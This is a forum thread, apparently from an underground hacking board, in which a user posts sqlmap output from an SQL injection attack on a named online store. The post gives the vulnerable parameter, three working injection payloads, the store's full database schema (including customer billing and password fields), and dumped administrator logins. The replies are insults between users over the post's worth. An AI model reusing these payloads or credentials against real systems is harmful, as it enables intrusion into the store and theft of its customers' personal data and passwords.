
Dump of the online store http://www.1001technologies.com

Thread in the "Databases | Catalogs" section, started by cyber_chinya, 28 Aug 2017.

  1. cyber_chinya

    Registered:
    12 Nov 2015
    Posts:
    51
    Likes:
    5
    Code:
    sqlmap identified the following injection point(s) with a total of 215 HTTP(s) requests:
    ---
    Parameter: catID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catID=1' AND 3370=3370 AND 'veNY'='veNY
    
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: catID=1' AND ROW(4927,8673)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(4927=4927,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM (SELECT 3266 UNION SELECT 4935 UNION SELECT 1839 UNION SELECT 2612)a GROUP BY x) AND 'eAdr'='eAdr
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: catID=1' AND SLEEP(5) AND 'AEJW'='AEJW
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    Database: ishoppingnow_ishop
    [12 tables]
    +---------------------------------------+
    | translate                             |
    | tbl_admin                             |
    | tbl_billing                           |
    | tbl_cart                              |
    | tbl_category                          |
    | tbl_country                           |
    | tbl_country_state                     |
    | tbl_exchange                          |
    | tbl_order                             |
    | tbl_order_detail                      |
    | tbl_product                           |
    | tbl_user_detail                       |
    +---------------------------------------+
    
    Database: ishoppingnow_ishop1
    [12 tables]
    +---------------------------------------+
    | translate                             |
    | tbl_admin                             |
    | tbl_billing                           |
    | tbl_cart                              |
    | tbl_category                          |
    | tbl_country                           |
    | tbl_country_state                     |
    | tbl_exchange                          |
    | tbl_order                             |
    | tbl_order_detail                      |
    | tbl_product                           |
    | tbl_user_detail                       |
    +---------------------------------------+
    
    Database: information_schema
    [17 tables]
    +---------------------------------------+
    | CHARACTER_SETS                        |
    | COLLATIONS                            |
    | COLLATION_CHARACTER_SET_APPLICABILITY |
    | COLUMNS                               |
    | COLUMN_PRIVILEGES                     |
    | KEY_COLUMN_USAGE                      |
    | PROFILING                             |
    | ROUTINES                              |
    | SCHEMATA                              |
    | SCHEMA_PRIVILEGES                     |
    | STATISTICS                            |
    | TABLES                                |
    | TABLE_CONSTRAINTS                     |
    | TABLE_PRIVILEGES                      |
    | TRIGGERS                              |
    | USER_PRIVILEGES                       |
    | VIEWS                                 |
    +---------------------------------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_order_detail
    [4 columns]
    +---------------+---------+
    | Column        | Type    |
    +---------------+---------+
    | fldid         | int(11) |
    | int_productid | int(11) |
    | order_id      | int(11) |
    | qty           | int(11) |
    +---------------+---------+
    
    Database: ishoppingnow_ishop
    Table: tbl_exchange
    [2 columns]
    +----------------+-------------+
    | Column         | Type        |
    +----------------+-------------+
    | exchange_price | varchar(20) |
    | int_id         | int(11)     |
    +----------------+-------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_order
    [3 columns]
    +------------+---------+
    | Column     | Type    |
    +------------+---------+
    | amount     | float   |
    | bit_active | char(1) |
    | order_id   | int(11) |
    +------------+---------+
    
    Database: ishoppingnow_ishop
    Table: tbl_billing
    [17 columns]
    +----------------+--------------+
    | Column         | Type         |
    +----------------+--------------+
    | bit_active     | char(1)      |
    | int_user_id    | int(11)      |
    | int_zip        | varchar(11)  |
    | order_id       | int(11)      |
    | str_address_1  | varchar(255) |
    | str_address_2  | varchar(255) |
    | str_cell_phone | varchar(20)  |
    | str_city       | varchar(150) |
    | str_country    | int(11)      |
    | str_date       | date         |
    | str_email      | varchar(50)  |
    | str_first_name | varchar(50)  |
    | str_home_phone | varchar(50)  |
    | str_last_name  | varchar(50)  |
    | str_password   | varchar(50)  |
    | str_state      | int(11)      |
    | str_work_phone | varchar(20)  |
    +----------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_cart
    [5 columns]
    +---------------+--------------+
    | Column        | Type         |
    +---------------+--------------+
    | cart_id       | varchar(200) |
    | flddate       | date         |
    | fldid         | int(11)      |
    | int_productid | int(11)      |
    | qty           | smallint(2)  |
    +---------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_category
    [6 columns]
    +------------------+---------------+
    | Column           | Type          |
    +------------------+---------------+
    | add_price        | int(11)       |
    | bit_active       | enum('0','1') |
    | int_categoryId   | int(11)       |
    | parent_id        | int(11)       |
    | str_categoryName | varchar(255)  |
    | txt_categoryDesc | text          |
    +------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_country
    [3 columns]
    +----------------+--------------+
    | Column         | Type         |
    +----------------+--------------+
    | bit_active     | tinyint(4)   |
    | int_country_id | smallint(6)  |
    | str_country    | varchar(100) |
    +----------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_product
    [14 columns]
    +--------------------------+---------------+
    | Column                   | Type          |
    +--------------------------+---------------+
    | bit_active               | enum('0','1') |
    | bit_deal_of_week_product | char(1)       |
    | bit_featured_product     | char(1)       |
    | bit_hot_offers_product   | char(1)       |
    | int_categoryId           | varchar(11)   |
    | int_productId            | int(11)       |
    | int_subcategoryId        | int(11)       |
    | product_image            | varchar(50)   |
    | product_Price            | float         |
    | product_sale_price       | float         |
    | product_thumbnails       | varchar(50)   |
    | str_date                 | date          |
    | str_productDesc          | text          |
    | str_productName          | varchar(255)  |
    +--------------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_admin
    [3 columns]
    +---------------+--------------+
    | Column        | Type         |
    +---------------+--------------+
    | int_adminId   | int(11)      |
    | str_adminName | varchar(100) |
    | str_password  | varchar(100) |
    +---------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: translate
    [4 columns]
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | DE     | varchar(255) |
    | EN     | varchar(255) |
    | IC     | varchar(255) |
    | ID     | int(11)      |
    +--------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_country_state
    [5 columns]
    +----------------------+---------------+
    | Column               | Type          |
    +----------------------+---------------+
    | dec_tax_percentage   | decimal(11,2) |
    | int_country_id       | int(11)       |
    | int_country_state_id | int(11)       |
    | str_country_state    | varchar(50)   |
    | str_state_abbr       | varchar(10)   |
    +----------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_user_detail
    [16 columns]
    +----------------+---------------+
    | Column         | Type          |
    +----------------+---------------+
    | bit_active     | enum('0','1') |
    | int_user_id    | int(11)       |
    | int_zip        | varchar(11)   |
    | str_address_1  | varchar(225)  |
    | str_address_2  | varchar(225)  |
    | str_cell_phone | varchar(50)   |
    | str_city       | varchar(150)  |
    | str_country    | int(11)       |
    | str_date       | date          |
    | str_email      | varchar(100)  |
    | str_first_name | varchar(50)   |
    | str_home_phone | varchar(50)   |
    | str_last_name  | varchar(50)   |
    | str_password   | varchar(50)   |
    | str_state      | int(11)       |
    | str_work_phone | varchar(50)   |
    +----------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_user_detail
    [24 entries]
    
    Database: ishoppingnow_ishop
    Table: tbl_admin
    [2 entries]
    +---------------+--------------+
    | str_adminName | str_password |
    +---------------+--------------+
    | admin         | admin        |
    | fuckup        | fuckup       |
    +---------------+--------------+
    
  2. bios

    Registered:
    22 Jun 2012
    Posts:
    547
    Likes:
    629
    Keep junk like this to yourself, nobody here fucking needs it.
     
  3. cyber_chinya

    Registered:
    12 Nov 2015
    Posts:
    51
    Likes:
    5
    Are you smart enough to post something worthwhile yourself? When I post something worthwhile, I put a strict anti-noob on it; keep your emotions to yourself.
    Next time I'll post something real and valuable under a strict anti-noob and a big hide.
     
  4. bios

    Registered:
    22 Jun 2012
    Posts:
    547
    Likes:
    629
    Unlike you, I don't post dumps of all kinds of shit-markets, so don't fucking show off about brains here. Go to the fuckav-type sites and post your underworld there )
     
